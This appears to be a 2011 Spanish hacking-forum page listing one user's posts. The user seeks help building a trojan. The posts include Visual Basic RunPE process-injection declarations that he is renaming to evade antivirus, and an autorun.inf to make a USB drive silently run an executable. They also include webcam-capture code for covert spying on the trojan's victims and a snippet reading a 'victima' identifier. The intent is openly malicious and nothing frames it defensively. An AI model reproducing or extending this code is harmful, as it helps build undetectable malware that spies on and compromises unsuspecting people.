elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Guía actualizada para evitar que un ransomware ataque tu empresa


  Mostrar Mensajes
Páginas: 1 2 3 4 5 [6]
51  Seguridad Informática / Análisis y Diseño de Malware / Re: Crear un crypter 100% indetectable en: 22 Octubre 2011, 16:15 pm
Oye estoy contigo,lo que necesitamos es saber como crear nuestro propio Runpe no crear Crypters que eso ya se sabe de sobra...Alguien tiene idea????????? >:D >:D >:D >:D >:D >:D >:D >:D
52  Programación / Programación Visual Basic / Puedo modificar este trozo de Runpe?? en: 21 Octubre 2011, 02:02 am
Hola,me gustaria saber me gustaria saber que variables podria cambiar de este codigo que he puesto,ya que lo estoy renombrando practicamente todo,¿¿¿las que estan como as long se pueden o cuales??? si me orientais un poco seria de agradecer,aqui hos dejo el codigo:

Código:
Option Explicit

Private Const CONTEXT_FULL As Long = &H10007
Private Const MAX_PATH As Integer = 260
Private Const CREATE_SUSPENDED As Long = &H4
Private Const MEM_COMMIT As Long = &H1000
Private Const MEM_RESERVE As Long = &H2000
Private Const PAGE_EXECUTE_READWRITE As Long = &H40

Private Declare Function CreateProcessA Lib "kernel32" (ByVal lpAppName As String, ByVal lpCommandLine As String, ByVal lpProcessAttributes As Long, ByVal lpThreadAttributes As Long, ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long, ByVal lpEnvironment As Long, ByVal lpCurrentDirectory As Long, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long
Private Declare Function WriteProcessMemory Lib "kernel32" (ByVal hProcess As Long, lpBaseAddress As Any, bvBuff As Any, ByVal nSize As Long, lpNumberOfBytesWritten As Long) As Long
Private Declare Function OutputDebugString Lib "kernel32" Alias "OutputDebugStringA" (ByVal lpOutputString As String) As Long

Public Declare Sub RtlMoveMemory Lib "kernel32" (Dest As Any, Src As Any, ByVal L As Long)
Private Declare Function CallWindowProcA Lib "user32" (ByVal addr As Long, ByVal p1 As Long, ByVal p2 As Long, ByVal p3 As Long, ByVal p4 As Long) As Long
Private Declare Function GetProcAddress Lib "kernel32" (ByVal hModule As Long, ByVal lpProcName As String) As Long
Private Declare Function LoadLibraryA Lib "kernel32" (ByVal lpLibFileName As String) As Long

Private Type SECURITY_ATTRIBUTES
nLength As Long
lpSecurityDescriptor As Long
bInheritHandle As Long
End Type

Private Type STARTUPINFO
cb As Long
lpReserved As Long
lpDesktop As Long
lpTitle As Long
dwX As Long
dwY As Long
dwXSize As Long
dwYSize As Long
dwXCountChars As Long
dwYCountChars As Long
dwFillAttribute As Long
dwFlags As Long
wShowWindow As Integer
cbReserved2 As Integer
lpReserved2 As Long
hStdInput As Long
hStdOutput As Long
hStdError As Long
End Type

Private Type PROCESS_INFORMATION
hProcess As Long
hThread As Long
dwProcessId As Long
dwThreadID As Long
End Type

Private Type FLOATING_SAVE_AREA
ControlWord As Long
StatusWord As Long
TagWord As Long
ErrorOffset As Long
ErrorSelector As Long
DataOffset As Long
DataSelector As Long
RegisterArea(1 To 80) As Byte
Cr0NpxState As Long
End Type

Private Type CONTEXT
ContextFlags As Long

Dr0 As Long
Dr1 As Long
Dr2 As Long
Dr3 As Long
Dr6 As Long
Dr7 As Long

FloatSave As FLOATING_SAVE_AREA
SegGs As Long
SegFs As Long
SegEs As Long
SegDs As Long
Edi As Long
Esi As Long
Ebx As Long
Edx As Long
Ecx As Long
Eax As Long
Ebp As Long
Eip As Long
SegCs As Long
EFlags As Long
Esp As Long
SegSs As Long
End Type

Private Type IMAGE_DOS_HEADER
e_magic As Integer
e_cblp As Integer
e_cp As Integer
e_crlc As Integer
e_cparhdr As Integer
e_minalloc As Integer
e_maxalloc As Integer
e_ss As Integer
e_sp As Integer
e_csum As Integer
e_ip As Integer
e_cs As Integer
e_lfarlc As Integer
e_ovno As Integer
e_res(0 To 3) As Integer
e_oemid As Integer
e_oeminfo As Integer
e_res2(0 To 9) As Integer
e_lfanew As Long
End Type

Private Type IMAGE_FILE_HEADER
Machine As Integer
NumberOfSections As Integer
TimeDateStamp As Long
PointerToSymbolTable As Long
NumberOfSymbols As Long
SizeOfOptionalHeader As Integer
characteristics As Integer
End Type

Private Type IMAGE_DATA_DIRECTORY
VirtualAddress As Long
Size As Long
End Type

Private Type IMAGE_OPTIONAL_HEADER
Magic As Integer
MajorLinkerVersion As Byte
MinorLinkerVersion As Byte
SizeOfCode As Long
SizeOfInitializedData As Long
SizeOfUnitializedData As Long
AddressOfEntryPoint As Long
BaseOfCode As Long
BaseOfData As Long
ImageBase As Long
SectionAlignment As Long
FileAlignment As Long
MajorOperatingSystemVersion As Integer
MinorOperatingSystemVersion As Integer
MajorImageVersion As Integer
MinorImageVersion As Integer
MajorSubsystemVersion As Integer
MinorSubsystemVersion As Integer
W32VersionValue As Long
SizeOfImage As Long
SizeOfHeaders As Long
CheckSum As Long
SubSystem As Integer
DllCharacteristics As Integer
SizeOfStackReserve As Long
SizeOfStackCommit As Long
SizeOfHeapReserve As Long
SizeOfHeapCommit As Long
LoaderFlags As Long
NumberOfRvaAndSizes As Long
DataDirectory(0 To 15) As IMAGE_DATA_DIRECTORY
End Type

Private Type IMAGE_NT_HEADERS
Signature As Long
FileHeader As IMAGE_FILE_HEADER
OptionalHeader As IMAGE_OPTIONAL_HEADER
End Type

Private Type IMAGE_SECTION_HEADER
SecName As String * 8
VirtualSize As Long
VirtualAddress As Long
SizeOfRawData As Long
PointerToRawData As Long
PointerToRelocations As Long
PointerToLinenumbers As Long
NumberOfRelocations As Integer
NumberOfLinenumbers As Integer
characteristics As Long
End Type


Porfavor Orientadme un poco
53  Sistemas Operativos / Windows / Re: Como Iniciar Autorun en Windows 7????? en: 18 Octubre 2011, 10:31 am
Eso ya lo lei de ahi que añadi alguna funcion para que se autoejecutara,pero no lo consigo, se expande pero no se ejecuta...y el antivirus no es ya que es 100% FUD
¿Crees que solo afectara a Windows vista y XP??Segun esas paginas XP permite autoejecuciones y vista igual...pero Windows 7 y Mac no. :-[ :-[ :-[
54  Sistemas Operativos / Windows / Como Iniciar Autorun en Windows 7????? en: 18 Octubre 2011, 02:37 am
bueno el lio es ese añado este codigo de autorun en un pendrive pero no me ejecuta el exe al insertar el pendrive o abrirlo

Código:
[autorun]
open=ais.exe
icon=%SystemRoot%system32SHELL32.dll,4
action=Open folder to view files
UseAuTOPLAY=1
shellopencommand=ais.exe
shellExploreCommand=ais.exe
ShellExecute=ais.exe

La cuestion es que si se copia al pendrive al ejecutarlo ho al meter cualquier disco duro externo,pero no se autoejecuta,como lo podria lograr????
55  Programación / Programación Visual Basic / Re: Como recibo Imagenes de Webcam en mi Troyano???? en: 12 Octubre 2011, 19:38 pm
Hola,tomo este codigo como ejemplo para introducir en mi troyano:

Código:
Private Declare Function SendMessage Lib "USER32" Alias "SendMessageA" (ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, lParam As Any) As Long
Private Declare Function capCreateCaptureWindow Lib "avicap32.dll" Alias "capCreateCaptureWindowA" (ByVal lpszWindowName As String, ByVal dwStyle As Long, ByVal X As Long, ByVal Y As Long, ByVal nWidth As Long, ByVal nHeight As Long, ByVal hwndParent As Long, ByVal nID As Long) As Long
Private mCapHwnd As Long

Private Sub Form_Load()
STARTCAM
End Sub

Private Sub Timer1_Timer()
SendMessage mCapHwnd, 1084, 0, 0
SendMessage mCapHwnd, 1054, 0, 0
Picture1.Picture = Clipboard.GetData
End Sub
Sub STARTCAM()
mCapHwnd = capCreateCaptureWindow("WebcamCapture", 0, 0, 0, 640, 480, Me.hwnd, 0)
'DoEvents
SendMessage mCapHwnd, 1034, 0, 0
End Sub


El Timer lo pongo a intervalo = 1 e intentado ponerlo en el cliente pero me da error,estoy pensando como ponerlo...pero no se como...
56  Programación / Programación Visual Basic / Como recibo Imagenes de Webcam en mi Troyano???? en: 11 Octubre 2011, 23:00 pm
como actualizar las imagenes que recibo de la webcam,las recibo en un Picturebox,en mi cliente,pero solo recibo 1 imagen,me faltaria recibir las que bienen a continuacion...se que se debe hacer desde un Timer,e intentado poner Picture1.Refresh en el Timer,pero no me las refresca,sigo recibiendo solo 1 imagen :(
57  Programación / Programación Visual Basic / Re: Como soluciono este error???(es el codigo de un troyano) en: 11 Octubre 2011, 21:17 pm
Gracias ya solucione lo del error ese,ahora ma faltaria como actualizar las imagenes que recibo de la webcam,las recibo en un Picturebox,en mi cliente,pero solo recibo 1 imagen,me faltaria recibir las que bienen a continuacion...se que se debe hacer desde un Timer,e intentado poner Picture1.Refresh en el Timer,pero no me las refresca,sigo recibiendo solo 1 imagen :(
58  Programación / Programación Visual Basic / Como soluciono este error???(es el codigo de un troyano) en: 11 Octubre 2011, 12:57 pm
Aqui esta el codigo:
Código:
Open Environ("windir") & "\KB007.txt" For Input As #1
Input #1, victima
If victima = "" Then
victima = "Default"

en la primera linea me tira un error llamado:
Run-time error '55':
File already open

¿¿Como lo podria solucionar??
Páginas: 1 2 3 4 5 [6]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines